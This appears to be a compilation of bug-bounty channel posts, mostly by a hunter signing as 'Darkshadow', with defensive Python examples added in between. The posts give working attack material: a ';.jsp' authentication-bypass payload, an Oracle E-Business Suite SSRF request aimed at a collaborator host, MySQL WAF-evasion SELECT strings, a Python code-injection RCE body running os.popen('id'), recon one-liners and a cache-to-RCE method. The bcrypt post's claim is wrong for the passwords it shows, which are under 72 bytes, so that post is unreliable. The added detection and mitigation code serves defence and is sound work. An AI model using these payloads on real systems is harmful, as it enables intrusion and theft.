Extract all endpoints from a JS file and take your bug
- Method one
waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+\.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu
(The awk separator is '//' so that $2 is the host and path after the scheme; with a single '/' the field is empty and nothing is printed. The pattern is egrep's ERE: \s* around [=:] matches optional whitespace, and the inner grep -P pattern picks up quoted absolute/relative URLs and .get/.post/.ajax/.load calls.)
- Method two
cat JS.txt | grep -aoP "(?<=(\"|'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|'|\`))" | sort -u | tee endpoints.txt
(grep needs -P for the lookbehind/lookahead, and the characters inside the class must be escaped so that /-# is not read as a reverse range. Write the result to a separate file such as endpoints.txt: tee'ing back into JS.txt truncates the input before cat has read it.)
#infosec #cybersec #bugbountytips
Hey Hunters,
Darkshadow here, back again!
Authentication bypass method:
Steps:
1. Target..com/carbon/server-admin/memory_info.jsp = redirects to the login page [301 status]
2. Target..com/carbon/server-admin/memory_info.jsp;.jsp = gives the page content without authentication [200 status]
Payload: ;.jsp
Tip:
1. Find sensitive paths in JS files which need authentication.
2. Try to find endpoints which end with an extension like .php, .jsp, .shtml etc.
3. Simply fuzz every endpoint with the same extension payload, like ;.jsp ;.php ;.shtml
If any of these gives 200 OK, check it manually. It might work!
Don't forget to show your love, guys
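The check below is an added example and not part of the post above. It shows the defensive side of the ";.jsp" trick: servlet containers strip ";param" path parameters from each segment before routing, so an authorization filter that compares the raw request URI sees a different string from the one the backend serves. Canonicalizing the path the same way before deciding closes the gap. The protected path set and the exact-match rule are assumptions made for the example.

```python
import posixpath
from urllib.parse import unquote

# Assumption for this example: the auth layer protects these exact paths.
PROTECTED_PATHS = {"/carbon/server-admin/memory_info.jsp"}


def canonicalize_path(raw_path: str) -> str:
    """Reduce a request path to the form the servlet container will route.

    1. drop the query string and percent-decode once (so %3B becomes ';')
    2. strip ';param' path parameters from every segment (";.jsp", ";jsessionid=...")
    3. collapse repeated slashes and resolve '.' and '..' segments
    """
    decoded = unquote(raw_path.split("?", 1)[0])
    segments = [seg.split(";", 1)[0] for seg in decoded.split("/")]
    joined = "/".join(segments)
    canonical = posixpath.normpath(joined or "/")
    # normpath keeps a leading '//' intact; force a single leading slash
    return "/" + canonical.lstrip("/")


def naive_is_protected(raw_path: str) -> bool:
    """Exact-match check on the raw URI: the kind of filter that gets bypassed."""
    return raw_path in PROTECTED_PATHS


def is_protected(raw_path: str) -> bool:
    """Same rule, but decided on the canonical path the backend will actually serve."""
    return canonicalize_path(raw_path) in PROTECTED_PATHS


if __name__ == "__main__":
    # Constructed request paths, including the ';.jsp' variant from the post.
    for p in ["/carbon/server-admin/memory_info.jsp",
              "/carbon/server-admin/memory_info.jsp;.jsp",
              "/carbon/server-admin/memory_info.jsp%3B.jsp",
              "/carbon//server-admin/./memory_info.jsp;jsessionid=abc"]:
        print(f"{p:58} naive={naive_is_protected(p)!s:5} canonical={is_protected(p)}")
```

Decoding once before splitting means an encoded slash (%2F) is also treated as a separator, which is the conservative choice for an authorization decision. Where the canonicalization rules of the real container are not known, rejecting any path that still contains ';' after decoding is the simpler policy.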
CVE-2025-64095 (CVSS 10.0): A critical flaw in DNN Platform allows unauthenticated website overwrite
Dorks
HUNTER: product.name="DotNetNuke"
Hey Hunter,
DarkShadow is here, back again, dropping another SSRF!
Oracle E-Business Suite (12.2.3-12.2.14) SSRF POC
Method: POST
Path: /OA_HTML/configurator/UiServlet
Parameter: return_url
Body:
redirectFromJsp=1&getUiType=<?xml version="1.0" encoding="UTF-8"?>
<initialize>
<param name="init_was_saved">anything</param>
<param name="return_url">https://BURP_COLLABORATOR</param>
<param name="ui_def_id">0</param>
<param name="config_effective_usage_id">0</param>
<param name="ui_type">Applet</param>
</initialize>
If you guys love to read, then show your love
#bugbountytips #ssrf
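As an added example (not part of the post above), the function below shows the check a WAF rule or the servlet itself should apply to the body shown: parse the getUiType XML, pull out return_url, and reject any absolute URL whose host is not one the application is served from. The allowed host list and the oast-placeholder.invalid target are constructed for the example; the body builder reproduces the shape of the request from the post, URL-encoded as it would travel on the wire.

```python
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlencode, urlparse

# Assumption for this example: hostnames the application itself is served from.
ALLOWED_HOSTS = frozenset({"ebs.example.com"})


def extract_return_url(body: str):
    """Pull <param name="return_url"> out of the getUiType XML in a form body."""
    fields = parse_qs(body, keep_blank_values=True)
    xml_text = fields.get("getUiType", [""])[0]
    try:
        root = ET.fromstring(xml_text.encode("utf-8"))
    except ET.ParseError:  # empty or malformed XML: nothing to redirect to
        return None
    for param in root.iter("param"):
        if param.get("name") == "return_url":
            return (param.text or "").strip()
    return None


def offending_host(body: str, allowed=ALLOWED_HOSTS):
    """Return the external host return_url points at, or None when it is acceptable."""
    url = extract_return_url(body)
    if not url:
        return None
    host = urlparse(url).hostname  # also catches scheme-relative //host/ forms
    if host is None:               # relative path such as /OA_HTML/..., stays on the app
        return None
    return None if host in allowed else host


def build_body(return_url: str) -> str:
    """Constructed request body in the shape shown in the post, URL-encoded."""
    xml = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        "<initialize>"
        '<param name="init_was_saved">anything</param>'
        f'<param name="return_url">{return_url}</param>'
        '<param name="ui_def_id">0</param>'
        '<param name="config_effective_usage_id">0</param>'
        '<param name="ui_type">Applet</param>'
        "</initialize>"
    )
    return urlencode({"redirectFromJsp": "1", "getUiType": xml})


if __name__ == "__main__":
    for target in ["https://oast-placeholder.invalid/",
                   "https://ebs.example.com/OA_HTML/AppsLogin",
                   "/OA_HTML/AppsLogin"]:
        print(f"{target:45} -> {offending_host(build_body(target))}")
```

An allowlist on the host is the right shape for this class of bug; a denylist of private ranges is not, because the fetch can be redirected after the check. Logging the offending host gives the SOC a clean indicator to pivot on.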
Grab all the GF Patterns from different repositories in one shot!
Link: https://github.com/thecybertix/GF-Patterns
This repository contains all the GF-Patterns repositories. All we have to do is just run the given shell file and it's done!
Nov 7: Mon & Fri, 8:00 PM IST
Nov 8: Sat & Sun, 9:00 PM IST
Outdated but helpful: some MySQL tricks to break some #WAFs out there, by @BRuteLogic
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`
#infosec #cybersec #bugbountytips
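Why these five lines get past whitespace-based rules, shown in an added example that is not from the post: MySQL's parser accepts a numeric literal (1e1, 1.), the \N null literal, or an operator (-, ~, @, ^) as a token boundary, so no space is needed between SELECT, the selected expression and FROM. A detection that tokenizes the same way sees the SELECT ... FROM sequence regardless of spacing. The token grammar below is a small assumed subset of MySQL's, enough for these forms.

```python
import re

# Token grammar for the fragments above: a number, the \N null literal, an
# identifier/keyword, a quoted name or string, or a single operator character.
# Whitespace is optional between most of these, which is what the tricks exploit.
TOKEN = re.compile(
    r"""
    (?P<num>\d+\.?\d*(?:[eE]\d+)?)        # 1, 1., 1e1
  | (?P<null>\\N)                         # MySQL's \N literal
  | (?P<ident>[A-Za-z_][A-Za-z0-9_]*)     # keywords and column names
  | (?P<quoted>`[^`]*`|'[^']*'|"[^"]*")   # `test`, 'str', "str"
  | (?P<op>[-~@^.+*/%(),=<>!&|])          # operators that can glue tokens together
  | (?P<ws>\s+)
    """,
    re.VERBOSE,
)


def tokenize(sql: str):
    """Split sql into (kind, text) tokens without requiring whitespace separators."""
    tokens, pos = [], 0
    while pos < len(sql):
        m = TOKEN.match(sql, pos)
        if m is None:                       # unknown character: keep it as its own token
            tokens.append(("other", sql[pos]))
            pos += 1
            continue
        if m.lastgroup != "ws":
            tokens.append((m.lastgroup, m.group()))
        pos = m.end()
    return tokens


def naive_detect(sql: str) -> bool:
    """Whitespace-based rule many filters use: SELECT <something> FROM."""
    return re.search(r"\bSELECT\s+\S.*?\s+FROM\b", sql, re.IGNORECASE) is not None


def token_detect(sql: str) -> bool:
    """Keyword-sequence check on tokens, so the glued forms are still recognised."""
    words = [text.upper() for kind, text in tokenize(sql) if kind == "ident"]
    if "SELECT" not in words:
        return False
    return "FROM" in words[words.index("SELECT") + 1:]


# The five payloads from the post, as constructed sample inputs.
PAYLOADS = [
    "SELECT-1e1FROM`test`",
    "SELECT~1.FROM`test`",
    "SELECT\\NFROM`test`",
    "SELECT@^1.FROM`test`",
    "SELECT-id-1.FROM`test`",
]

if __name__ == "__main__":
    for p in PAYLOADS:
        print(f"{p:28} naive={naive_detect(p)!s:5} tokens={token_detect(p)}")
```

The general point is that a filter should make its decision on the same token stream the database will see; a regex over raw bytes with \s+ between keywords is the part that is "outdated" here, not the payloads.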
Hey Hunters,
Darkshadow here, back again, and just look at this wild thing:
User 1 password:
protecting_my_accounts_with_long_readable_passwords123
User 2 password:
protecting_my_accounts_with_long_readable_passwords456
If the web application is using the bcrypt hash algorithm, then both users can log in to each other's account using their different passwords!
Explanation:
bcrypt only uses the first 72 bytes to make the hash. That means that after 72 bytes, every byte (the 73rd, 74th, ...) is ignored!
So if any two users' first 72 bytes are the same (protecting_my_accounts_with_long_readable_passwords), then no matter what they put after that in the password, they can both log in to each other's account.
#bugbountytips
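As an added example (not from the post), the block below makes the 72-byte limit concrete and shows the two standard mitigations. bcrypt hashes at most the first 72 bytes of the password, so two passwords collide exactly when their first 72 bytes agree. The two strings quoted above are 54 bytes long in UTF-8, so for that pair the truncation does not come into play; the constructed 75-byte pair in the block is the case where it does. The pre-hash (SHA-256, base64-encoded, then bcrypt) and the registration length policy are the usual fixes; the helper names are this example's own.

```python
import base64
import hashlib

BCRYPT_MAX_BYTES = 72  # bcrypt feeds at most 72 bytes of the password into its key schedule

# The two passwords from the post above (each 54 bytes long in UTF-8).
PAGE_PW1 = "protecting_my_accounts_with_long_readable_passwords123"
PAGE_PW2 = "protecting_my_accounts_with_long_readable_passwords456"


def bcrypt_effective_input(password: str) -> bytes:
    """The bytes bcrypt actually hashes: everything past byte 72 is dropped."""
    return password.encode("utf-8")[:BCRYPT_MAX_BYTES]


def collide_under_bcrypt(pw1: str, pw2: str) -> bool:
    """True when bcrypt would verify either password against the other's hash."""
    return pw1 != pw2 and bcrypt_effective_input(pw1) == bcrypt_effective_input(pw2)


def prehash_for_bcrypt(password: str) -> bytes:
    """Mitigation 1: SHA-256 then base64 gives a fixed 44-byte input for bcrypt,
    so every byte of the password influences the hash and none is discarded.
    base64 also avoids NUL bytes, which some bcrypt implementations treat as
    string terminators. Apply this consistently on both hash and verify."""
    digest = hashlib.sha256(password.encode("utf-8")).digest()
    return base64.b64encode(digest)


def registration_policy_ok(password: str) -> bool:
    """Mitigation 2: refuse passwords bcrypt could not hash in full (count bytes, not characters)."""
    return len(password.encode("utf-8")) <= BCRYPT_MAX_BYTES


if __name__ == "__main__":
    long1, long2 = "a" * 72 + "123", "a" * 72 + "456"   # constructed 75-byte pair
    print("post pair collides under bcrypt:", collide_under_bcrypt(PAGE_PW1, PAGE_PW2))
    print("75-byte pair collides under bcrypt:", collide_under_bcrypt(long1, long2))
    print("75-byte pair differs after pre-hash:", prehash_for_bcrypt(long1) != prehash_for_bcrypt(long2))
```

Counting bytes rather than characters matters: a 40-character password made of two-byte UTF-8 characters is already 80 bytes and would be truncated.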
Hey Hunters,
Darkshadow here, back again, with another unique RCE method!
RCE via Python code injection:
POC:
{
"name": "darkshadow",
"args": {},
"json_schema": {"type": "object", "properties": {}},
"source_code": "def darkshadow():\n import os\n data='0'.encode('utf-8')\n return ''+os.popen('id').read()"
}
Do you guys really enjoy reading my methodologies? If you want more,
guys, then feel free to share your thoughts in the comments
Don't forget to follow me, guys: x.com/darkshadow2bd
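The root cause in the request above is a "source_code" field that the server compiles and runs. As an added example (not from the post), the auditor below parses such a field with Python's ast module and reports imports, calls to interpreter- or OS-level functions, and dunder attribute access, using the request from the post as its sample input. The field and function names, and the forbidden-call sets, are this example's own assumptions.

```python
import ast
import json

# Calls that hand control to the interpreter or the OS, whatever the module is called.
FORBIDDEN_NAMES = {"eval", "exec", "compile", "open", "__import__",
                   "getattr", "globals", "locals", "vars", "breakpoint"}
FORBIDDEN_ATTRS = {"popen", "system", "Popen", "check_output"}


def audit_source_code(src: str) -> list:
    """Return a list of findings for user-supplied Python source; empty means nothing flagged."""
    try:
        tree = ast.parse(src)
    except SyntaxError as exc:
        return [f"syntax error at line {exc.lineno}: {exc.msg}"]
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            findings.append(f"line {node.lineno}: import of " + ", ".join(a.name for a in node.names))
        elif isinstance(node, ast.ImportFrom):
            findings.append(f"line {node.lineno}: import from {node.module}")
        elif isinstance(node, ast.Call):
            fn = node.func
            if isinstance(fn, ast.Name) and fn.id in FORBIDDEN_NAMES:
                findings.append(f"line {node.lineno}: call to {fn.id}()")
            elif isinstance(fn, ast.Attribute) and fn.attr in FORBIDDEN_ATTRS:
                findings.append(f"line {node.lineno}: call to .{fn.attr}()")
        elif isinstance(node, ast.Attribute) and node.attr.startswith("__"):
            findings.append(f"line {node.lineno}: dunder attribute access .{node.attr}")
    return findings


def audit_request(json_body: str) -> list:
    """Audit the source_code field of a JSON request body like the one in the post."""
    doc = json.loads(json_body)
    return audit_source_code(doc.get("source_code", ""))


# The request body from the post, reproduced as the sample input.
PAGE_REQUEST = json.dumps({
    "name": "darkshadow",
    "args": {},
    "json_schema": {"type": "object", "properties": {}},
    "source_code": "def darkshadow():\n import os\n data='0'.encode('utf-8')\n return ''+os.popen('id').read()",
})

if __name__ == "__main__":
    for finding in audit_request(PAGE_REQUEST):
        print(finding)
```

A denylist like this is a detection and triage aid, not a sandbox: Python offers many routes to the same primitives, so the actual fix is not to exec caller-supplied code in the application process at all, or to run it in an isolated runtime with no filesystem or network.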
Tool of the Day: IPING - IP Lookup & Detection
Need quick IP facts? IPING lets you look up any IP or domain.
Instant, accurate, and totally free: returns ISP, country, city, coordinates, ASN, risk score and more. Perfect for OSINT, incident triage, or simple curiosity.
Try it now: https://www.iping.cc/
#osint #infosec #cybersecurity #recon #bugbounty #tools #ip
The ultimate 403 Bypass wordlists and tester notes by JHaddix
Github: Link
---------------------------------------------------------
Level Up Your Cybersec Game!
brutsec.com
Telegram: t.iss.one/brutsecurity
X: x.com/brutsecurity
Ethical Hacking Bootcamp: topmate.io/saumadip/1391531
Course Enrollment: wa.link/brutsecurity
Like this post? Follow, Join, Subscribe & Send Stars to show your support!
#bugbounty #bugbountytips #cybersecurity #infosec #brutsecurity
SubDomain Grabber - A bug bounty tool to download, unzip, and clean subdomains from Chaos ProjectDiscovery.
Converts *.abc.com to https://abc.com, organizes into directories, and removes ZIPs. Offers a colorful CLI, filters (BugCrowd, HackerOne, etc.), sorting, and pagination.
https://github.com/MuhammadWaseem29/SubDomain-Grabber
Discover IPING - Your Go-To IP Intelligence Tool
IPING helps you uncover what's behind any IP address in seconds.
From location and ASN to proxy status and risk level: all the insights you need for smarter investigations or secure online operations. No sign-up, no limits, only accurate results.
Explore now: https://www.iping.cc/
Hey Hunter,
What do you think: is web cache to RCE possible or not?
Yes! It's really very interesting. Post coming soon.
Hey Hunters,
Darkshadow here, back again, dropping a really very interesting method.
Web cache to RCE!
While I was normally visiting the web application, I noticed that the website actively makes a cache file from the client side to store errors.
Now the idea is: if we are able to make any custom error, then it will be cached, and if somehow the error executes on the system, we might see the output.
Exploit to reproduce the final RCE:
1. The webapp was sending a request from the client side in an array-based parameter.
2. Change the valid input to PHP code using the system function. Here we are just trying to make an error using the invalid input.
3. Now the web application is not able to handle this input, makes an error and stores it in a cache file.
4. After visiting the cache file, the error message is reflected in the cache file.
5. But wait, it also executes my PHP code and stores the command output in the file. That means we can get OS command output in the cache file by making an error. That means RCE!
Follow me for more methods: x.com/darkshadow2bd